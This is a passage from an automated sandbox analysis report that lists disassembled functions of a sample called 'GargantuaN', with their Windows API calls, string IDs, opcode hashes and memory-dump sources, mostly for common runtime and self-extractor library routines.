                                                        • Opcode Fuzzy Hash: 9782399f7d7ff3e6b3c9976ab58fc6ec486547418d7582299a4bb69d0228fd9f
                                                        • Instruction Fuzzy Hash: E131593664434567DA30AB949C62B7AF3E8EB90720F64851FF88697280FA70AD4483B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7C8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D7C868: _free.LIBCMT ref: 00D7C891
                                                        • _free.LIBCMT ref: 00D7C8F2
                                                          • Part of subcall function 00D78DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?), ref: 00D78DE2
                                                          • Part of subcall function 00D78DCC: GetLastError.KERNEL32(?,?,00D7C896,?,00000000,?,00000000,?,00D7C8BD,?,00000007,?,?,00D7CCBA,?,?), ref: 00D78DF4
                                                        • _free.LIBCMT ref: 00D7C8FD
                                                        • _free.LIBCMT ref: 00D7C908
                                                        • _free.LIBCMT ref: 00D7C95C
                                                        • _free.LIBCMT ref: 00D7C967
                                                        • _free.LIBCMT ref: 00D7C972
                                                        • _free.LIBCMT ref: 00D7C97D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                        • Instruction ID: 39d238f12eccbdc62630d6e1053de2dca08f4eab226d99918b3985d8d18a6102
                                                        • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                        • Instruction Fuzzy Hash: CE110D71590B04EEE530B7B1CC0BFCB7BACDF04B10F809C19B29D66093EA65A5059771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6E5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00D6E669,00D6E5CC,00D6E86D), ref: 00D6E605
                                                        • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00D6E61B
                                                        • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00D6E630
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$HandleModule
                                                        • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                        • API String ID: 667068680-1718035505
                                                        • Opcode ID: 0c35f3e7fda556d03d8b70538e4452347a556453ba03e4c1580822c7b5dc3f6b
                                                        • Instruction ID: 0ef40febec86d8ed96a799a7c384a4243bae8ddc275e035af92c8f785106a867
                                                        • Opcode Fuzzy Hash: 0c35f3e7fda556d03d8b70538e4452347a556453ba03e4c1580822c7b5dc3f6b
                                                        • Instruction Fuzzy Hash: 86F0C23D790322DF4F215EEAEC945B667C86A257413280D79D905D3300EB10CC585BF1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D614C2
                                                          • Part of subcall function 00D5B146: GetVersionExW.KERNEL32(?), ref: 00D5B16B
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00D614E6
                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D61500
                                                        • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00D61513
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D61523
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00D61533
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                        • String ID:
                                                        • API String ID: 2092733347-0
                                                        • Opcode ID: 9fa0dc7703023152e08503834aa5226185e47796756ce84a19b37e910d36a71e
                                                        • Instruction ID: 01d3d0aacb180d4965f03b30e158c4731ad384f5841dc4997db74ec34d0697d7
                                                        • Opcode Fuzzy Hash: 9fa0dc7703023152e08503834aa5226185e47796756ce84a19b37e910d36a71e
                                                        • Instruction Fuzzy Hash: 7631D779118345ABC704DFA8C89499BB7F8FF98B14F044A1EF999C3210E730D549CBA6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D72AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,00D72AF1,00D702FC,00D6FA34), ref: 00D72B08
                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D72B16
                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D72B2F
                                                        • SetLastError.KERNEL32(00000000,00D72AF1,00D702FC,00D6FA34), ref: 00D72B81
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLastValue___vcrt_
                                                        • String ID:
                                                        • API String ID: 3852720340-0
                                                        • Opcode ID: f7e53f01bf889f3e4a95560cdff7f251963321f7d60185b1d71f2a9ba81aa7ae
                                                        • Instruction ID: 95fe34bd6fde1452091b00a979161f14a3793fc06da83906410c2d72825a1446
                                                        • Opcode Fuzzy Hash: f7e53f01bf889f3e4a95560cdff7f251963321f7d60185b1d71f2a9ba81aa7ae
                                                        • Instruction Fuzzy Hash: 3C01D4322283216EA7242E747C859362B99EB42B74B64873AF11C952E9FF114D04A674
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D797E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,00D91030,00D74674,00D91030,?,?,00D73F73,00000050,?,00D91030,00000200), ref: 00D797E9
                                                        • _free.LIBCMT ref: 00D7981C
                                                        • _free.LIBCMT ref: 00D79844
                                                        • SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D79851
                                                        • SetLastError.KERNEL32(00000000,?,00D91030,00000200), ref: 00D7985D
                                                        • _abort.LIBCMT ref: 00D79863
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free$_abort
                                                        • String ID:
                                                        • API String ID: 3160817290-0
                                                        • Opcode ID: ec2dcec57dddcbfeb1b3c7bf715f85774a0cbe5cec1d139beab19624575a6c12
                                                        • Instruction ID: 3f3094436253186cc325103ca540a220ebd7fdcb9d10ddb635a8f9fa1b69e4a4
                                                        • Opcode Fuzzy Hash: ec2dcec57dddcbfeb1b3c7bf715f85774a0cbe5cec1d139beab19624575a6c12
                                                        • Instruction Fuzzy Hash: 2EF0A4371507016AC72237286C2AB2F9A65CFD2B71F298129F51CD6392FE20C8055676
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D6DC47
                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6DC61
                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6DC72
                                                        • TranslateMessage.USER32(?), ref: 00D6DC7C
                                                        • DispatchMessageW.USER32(?), ref: 00D6DC86
                                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00D6DC91
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                        • String ID:
                                                        • API String ID: 2148572870-0
                                                        • Opcode ID: 45da822008497b2e66a1fe11bcacb3a9db16ba45e9be1d3781457c3a6de17ebe
                                                        • Instruction ID: 400eb09a4c3631b045d073aaa7bf176542188e43ce5668bb7f60e99d705f25cc
                                                        • Opcode Fuzzy Hash: 45da822008497b2e66a1fe11bcacb3a9db16ba45e9be1d3781457c3a6de17ebe
                                                        • Instruction Fuzzy Hash: 74F01472A01219FBCA206FA5EC4CDCB7F6DEF46791B044121B90AE2160D6649646DBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D605DA: _wcslen.LIBCMT ref: 00D605E0
                                                          • Part of subcall function 00D5B92D: _wcsrchr.LIBVCRUNTIME ref: 00D5B944
                                                        • _wcslen.LIBCMT ref: 00D5C197
                                                        • _wcslen.LIBCMT ref: 00D5C1DF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_wcsrchr
                                                        • String ID: .exe$.rar$.sfx
                                                        • API String ID: 3513545583-31770016
                                                        • Opcode ID: 5d95a45746ab1e5bde4cd49cd9ce8220d6b52d372385005ea5ff9d39bb7b822a
                                                        • Instruction ID: 69958957260f8f18b7747ee5e62fc4ba8e36930f6e8e79b99f26342467ebf549
                                                        • Opcode Fuzzy Hash: 5d95a45746ab1e5bde4cd49cd9ce8220d6b52d372385005ea5ff9d39bb7b822a
                                                        • Instruction Fuzzy Hash: B24127265207119ECF31AF648852E3BB3A4EF41B55F18690EFDC66B0C1EB509D89C3B5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000800,?), ref: 00D6CE9D
                                                          • Part of subcall function 00D5B690: _wcslen.LIBCMT ref: 00D5B696
                                                        • _swprintf.LIBCMT ref: 00D6CED1
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        • SetDlgItemTextW.USER32(?,00000066,00D9946A), ref: 00D6CEF1
                                                        • EndDialog.USER32(?,00000001), ref: 00D6CFFE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                        • String ID: %s%s%u
                                                        • API String ID: 110358324-1360425832
                                                        • Opcode ID: 26c3671ae3351a5ce96cae45d456631031629d630c874ce70b3243ca604a39b5
                                                        • Instruction ID: 6f64e80e7abd731c74c40fd8b0d8103ef02b889248afa80f249ed224ea14cf50
                                                        • Opcode Fuzzy Hash: 26c3671ae3351a5ce96cae45d456631031629d630c874ce70b3243ca604a39b5
                                                        • Instruction Fuzzy Hash: B641ADB1900218ABDF219BA4DC55EEA77BCEF05300F4080A6F949E7141EA718A88CFB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 00D5BB27
                                                        • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00D5A275,?,?,00000800,?,00D5A23A,?,00D5755C), ref: 00D5BBC5
                                                        • _wcslen.LIBCMT ref: 00D5BC3B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$CurrentDirectory
                                                        • String ID: UNC$\\?\
                                                        • API String ID: 3341907918-253988292
                                                        • Opcode ID: e64acbfbf4c3e948e6be267357d4898665d84dd66f9c360ca1ca706d1e715de2
                                                        • Instruction ID: 6c1cc9c724d4c542a3d01c02f3291aa7d3578a79917742103cf24c53ff7da135
                                                        • Opcode Fuzzy Hash: e64acbfbf4c3e948e6be267357d4898665d84dd66f9c360ca1ca706d1e715de2
                                                        • Instruction Fuzzy Hash: F3418E31400615ABCF21AF60CC02EFB77A9EF417A2F148467FC59A3151EB70DA988BB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadBitmapW.USER32(00000065), ref: 00D6B6ED
                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00D6B712
                                                        • DeleteObject.GDI32(00000000), ref: 00D6B744
                                                        • DeleteObject.GDI32(00000000), ref: 00D6B767
                                                          • Part of subcall function 00D6A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D6B73D,00000066), ref: 00D6A6D5
                                                          • Part of subcall function 00D6A6C2: SizeofResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A6EC
                                                          • Part of subcall function 00D6A6C2: LoadResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A703
                                                          • Part of subcall function 00D6A6C2: LockResource.KERNEL32(00000000,?,?,?,00D6B73D,00000066), ref: 00D6A712
                                                          • Part of subcall function 00D6A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D6B73D,00000066), ref: 00D6A72D
                                                          • Part of subcall function 00D6A6C2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,00D6B73D,00000066), ref: 00D6A73E
                                                          • Part of subcall function 00D6A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D6A7A7
                                                          • Part of subcall function 00D6A6C2: GlobalUnlock.KERNEL32(00000000), ref: 00D6A7C6
                                                          • Part of subcall function 00D6A6C2: GlobalFree.KERNEL32(00000000), ref: 00D6A7CD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                        • String ID: ]
                                                        • API String ID: 1428510222-3352871620
                                                        • Opcode ID: d93d5245e660f55b2d9432a4b5431376e1f77c5892d8e4fd2c30d1ef63e3132c
                                                        • Instruction ID: 989976b47fa07eaa1ac9d044f6ae80416aca7a39187d219fc0e75da28690d94c
                                                        • Opcode Fuzzy Hash: d93d5245e660f55b2d9432a4b5431376e1f77c5892d8e4fd2c30d1ef63e3132c
                                                        • Instruction Fuzzy Hash: 41010036540711A7C712BB788C4AA7F7AB9EFC0B62F0A0012F940F7291DF218D495AB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6D600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • EndDialog.USER32(?,00000001), ref: 00D6D64B
                                                        • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00D6D661
                                                        • SetDlgItemTextW.USER32(?,00000066,?), ref: 00D6D675
                                                        • SetDlgItemTextW.USER32(?,00000068), ref: 00D6D684
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: RENAMEDLG
                                                        • API String ID: 445417207-3299779563
                                                        • Opcode ID: 53ea0a69c50f770c99d00c5aa30da80a999f3c71edf624f1a9f0f3e018e55f40
                                                        • Instruction ID: b64c7b884d57cb7fbf946fecd7a5e2bc7c72669d99763eff17efb3626ed796a4
                                                        • Opcode Fuzzy Hash: 53ea0a69c50f770c99d00c5aa30da80a999f3c71edf624f1a9f0f3e018e55f40
                                                        • Instruction Fuzzy Hash: 3C01F533B84318FBD2205FA8ED09F567B5EEB9AB01F110111F645E21D4C6A2D9049B75
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D77E73 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D77E24,00000000,?,00D77DC4,00000000,00D8C300,0000000C,00D77F1B,00000000,00000002), ref: 00D77E93
                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D77EA6
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00D77E24,00000000,?,00D77DC4,00000000,00D8C300,0000000C,00D77F1B,00000000,00000002), ref: 00D77EC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: 8d1aa7a92ef82ac10af66562cebc2c158eb48fe4691b168f8fecb45f9cd5d7e5
                                                        • Instruction ID: ae9fa14595631e277461235078c7ab745d2eaf0858d57a3e8bf94d4af88e1cbb
                                                        • Opcode Fuzzy Hash: 8d1aa7a92ef82ac10af66562cebc2c158eb48fe4691b168f8fecb45f9cd5d7e5
                                                        • Instruction Fuzzy Hash: 07F04431914209BFCB119FA5DC09B9EBFB4EB44711F0480A9F809E2260DB309E44CBB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5F2C5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D6081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D60836
                                                          • Part of subcall function 00D6081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5F2D8,Crypt32.dll,00000000,00D5F35C,?,?,00D5F33E,?,?,?), ref: 00D60858
                                                        • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D5F2E4
                                                        • GetProcAddress.KERNEL32(00D981C8,CryptUnprotectMemory), ref: 00D5F2F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
